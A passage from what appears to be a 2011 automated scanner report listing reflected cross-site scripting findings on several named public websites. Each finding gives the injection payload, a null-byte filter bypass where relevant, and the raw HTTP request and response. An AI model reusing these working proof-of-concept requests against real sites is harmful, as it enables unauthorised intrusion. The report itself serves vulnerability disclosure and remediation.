This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/films/-/-/3.html?ef06b"><script>alert(1)</script>06db0769bba=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:56 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/D.html?ef06b"><script>alert(1)</script>06db0769bba=1" title="Search discussions for item "D""> ...[SNIP]...
3.45. http://boardreader.com/pop/instructions/-/-/7.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /pop/instructions/-/-/7.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5f8"><script>alert(1)</script>69f17f800bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/instructions/-/-/7.html?9a5f8"><script>alert(1)</script>69f17f800bf=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:57 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/How%2Bto%2BBuild%2Ban%2BEarthbag%2BDome.html?9a5f8"><script>alert(1)</script>69f17f800bf=1" title="Search discussions for item "How to Build an Earthbag Dome""> ...[SNIP]...
3.46. http://boardreader.com/pop/news/-/-/3.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /pop/news/-/-/3.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 633c8"><script>alert(1)</script>21ff8f9967b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/news/-/-/3.html?633c8"><script>alert(1)</script>21ff8f9967b=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:32:01 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/Chinese%2Bair%2Bforce%2Bdrill%2Blooks%2Bawfully%2Bsimilar%2Bto%2B%25E2%2580%2598Top%2BGun%25E2%2580%2599.html?633c8"><script>alert(1)</script>21ff8f9967b=1" title="Search discussions for item "Chinese air force drill looks awfully similar to ...Top Gun...""> ...[SNIP]...
3.47. http://boardreader.com/pop/releases/-/-/3.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /pop/releases/-/-/3.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccc3d"><script>alert(1)</script>263690e9a78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/releases/-/-/3.html?ccc3d"><script>alert(1)</script>263690e9a78=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:58 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/Hyundai%2BMotor%2BAmerica%2BReports%2BRecord%2BJanuary%2BSales%2B--%2BFOUNTAIN%2BVALLEY%252C%2BCalif.%252C%2BFeb.%2B1%252C%2B2011%2B%252FPRNewswire%252F%2B--.html?ccc3d"><script>alert(1)</script>263690e9a78=1" title="Search discussions for item "Hyundai Motor America Reports Record January Sales -- FOUNTAIN VALLEY, Calif., Feb. 1, 2011 /PRNewswire/ --""> ...[SNIP]...
3.48. http://boardreader.com/pop/sites.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /pop/sites.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c1aa'><script>alert(1)</script>341d035808d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:56 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href='/pop/sites.html?9c1aa'><script>alert(1)</script>341d035808d=1&o=10'> ...[SNIP]...
3.49. http://boardreader.com/pop/videos/-/-/3.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /pop/videos/-/-/3.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2008f"><script>alert(1)</script>ade1aee3939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pop/videos/-/-/3.html?2008f"><script>alert(1)</script>ade1aee3939=1 HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:32:03 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a class="disc" href="/s/Today%2BShow%2BJanuary%2B1994...What%2Bis%2Bthe%2BInternet%253F%253F.html?2008f"><script>alert(1)</script>ade1aee3939=1" title="Search discussions for item "Today Show January 1994...What is the Internet??""> ...[SNIP]...
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload f1c31<script>alert(1)</script>9c812db7f39 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /services/messagebroker/amf?playerKey=AQ~~,AAAADnAS0wE~,ddeyF9dBubzZEABHXI8Tafb593RYf5ad HTTP/1.1 Host: c.brightcove.com Proxy-Connection: keep-alive Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=486&height=322&flashID=myExperience700903960001&bgcolor=%23FFFFFF&playerID=64829845001&playerKey=AQ~~%2CAAAADnAS0wE~%2CddeyF9dBubzZEABHXI8Tafb593RYf5ad&isVid=true&dynamicStreaming=true&%40videoPlayer=700903960001&autoStart= content-type: application/x-amf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 538
The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 91ccd<script>alert(1)</script>82e43485041 was submitted in the rdid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload 26709<script>alert(1)</script>40fb537d3b1 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rdid request parameter is copied into the HTML document as plain text between tags. The payload 5634a<script>alert(1)</script>fed7ed4bbdf was submitted in the rdid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013&rdid=1201083812220968228"%3E%3C/script%3E5634a<script>alert(1)</script>fed7ed4bbdf HTTP/1.1 Host: cbi.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript; charset="UTF-8" Date: Thu, 03 Feb 2011 19:47:51 GMT Content-Length: 153
/* An error has occured: java.lang.NumberFormatException: For input string: "1201083812220968228"></script>5634a<script>alert(1)</script>fed7ed4bbdf" */
The value of the wdid request parameter is copied into the HTML document as plain text between tags. The payload fe98c<script>alert(1)</script>3b948965da2 was submitted in the wdid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /aid/3760177095415339810/bc.cbhs?wdid=798708614246318013fe98c<script>alert(1)</script>3b948965da2&rdid=1201083812220968228"%3E%3C/script%3E HTTP/1.1 Host: cbi.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/javascript; charset="UTF-8" Date: Thu, 03 Feb 2011 19:47:48 GMT Content-Length: 141
/* An error has occured: java.lang.NumberFormatException: For input string: "798708614246318013fe98c<script>alert(1)</script>3b948965da2" */
3.55. http://clicktoverify.truste.com/pvr.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://clicktoverify.truste.com
Path: /pvr.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the name of an HTML tag attribute. The payload e483d%20style%3dx%3aexpression(alert(1))%207543349c09e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e483d style=x:expression(alert(1)) 7543349c09e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b was submitted in the sealid parameter. This input was echoed as bb24b style=x:expression(alert(1)) 38cf935101b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pvr.php?page=validate&url=www.supermedia.com&sealid=101bb24b%20style%3dx%3aexpression(alert(1))%2038cf935101b HTTP/1.1 Host: clicktoverify.truste.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:48:18 GMT Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4 X-Powered-By: PHP/5.1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 8370
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Validation Page for Online Privacy Certification by TRUSTe</title> <meta nam ...[SNIP]... <input type='hidden' name='sealid' value=101bb24b style=x:expression(alert(1)) 38cf935101b> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c6e63"><script>alert(1)</script>ac88b9e9cb was submitted in the REST URL parameter 1. This input was echoed as c6e63"><script>alert(1)</script>ac88b9e9cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00c6e63"><script>alert(1)</script>ac88b9e9cb/2006/03/base/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:50:16 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1785 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00f1926<a>d08f4d1b1f6 was submitted in the REST URL parameter 1. This input was echoed as f1926<a>d08f4d1b1f6 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00f1926<a>d08f4d1b1f6/2006/03/base/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:50:17 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1643 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 98ff3<a>94fdf96a678 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/base98ff3<a>94fdf96a678/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:50:54 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Thu, 03 Feb 2011 19:50:55 GMT Last-Modified: Thu, 03 Feb 2011 19:50:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1351 Connection: close Content-Type: text/html; charset=UTF-8
3.60. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dean.edwards.name
Path: /weblog/2006/03/base/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae08"><script>alert(1)</script>c1a45a5709b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fae08\"><script>alert(1)</script>c1a45a5709b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/03/base/?fae08"><script>alert(1)</script>c1a45a5709b=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00a084d"><script>alert(1)</script>ceea5e5408a was submitted in the REST URL parameter 1. This input was echoed as a084d"><script>alert(1)</script>ceea5e5408a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%00a084d"><script>alert(1)</script>ceea5e5408a HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 373f2<script>alert(1)</script>e896c8e12b was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr373f2<script>alert(1)</script>e896c8e12b&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 326
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:25 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:25 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842125.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 13:54:01 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Fri, 04 Feb 2011 17:55:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 04 Feb 2011 17:55:25 GMT
Connection: close
3.63. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jqueryui.com
Path: /themeroller/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ad9c"><script>alert(1)</script>ce5a88a8f06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?2ad9c"><script>alert(1)</script>ce5a88a8f06=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 22:06:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117121
The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 714d6<script>alert(1)</script>a1c7f770126 was submitted in the version parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/veoh-ie6.css?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126 HTTP/1.1
Host: ll-appserver.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.0.10.1296766388;
div.spacer{clear:both;line-height:0px;font-size:0px;height:60px}div.smallSpacer{clear:both;line-height:0px;font-size:0px;height:20px}div.tinySpacer{clear:both;line-height:0px;font-size:0px;height:8px} ...[SNIP]... kenOut li{border:0;border-right:1px solid #d7d7d7;background:none}#bodyLevelThumbTip_leftOf .thumbMeta{background:transparent url(../images/hoverdetails_bg_shadow_right.png?version=AFrontend.5.5.4.1038714d6<script>alert(1)</script>a1c7f770126) no-repeat scroll center bottom}#veohPage, #contentHolder_watchFull #playerBottomOuterWrapper,#commentLoginWrapper{background-color:#fff}#contentHolder_watchFull #watch-controls, div.chooseCat ul li a ...[SNIP]...
The value of the version request parameter is copied into the HTML document as plain text between tags. The payload 88ebc<script>alert(1)</script>9e1cf63d45e was submitted in the version parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /styles/veoh.css?version=AFrontend.5.5.4.103888ebc<script>alert(1)</script>9e1cf63d45e HTTP/1.1
Host: ll-appserver.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"
3.66. http://managedq.com/search.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://managedq.com
Path: /search.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65f22"%3balert(1)//e219070d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 65f22";alert(1)//e219070d6eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.php?q=o/65f22"%3balert(1)//e219070d6ebbama HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:41 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13527
Connection: close
Content-Type: text/html
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be8e1"%3balert(1)//d33907aeb4e was submitted in the q parameter. This input was echoed as be8e1";alert(1)//d33907aeb4e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.php?q=obamabe8e1"%3balert(1)//d33907aeb4e HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13526
Connection: close
Content-Type: text/html
3.68. http://my.supermedia.com/customersupport/index.jsp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://my.supermedia.com
Path: /customersupport/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33517"><script>alert(1)</script>270ee3472e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:30 GMT
Content-Length: 19431
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly
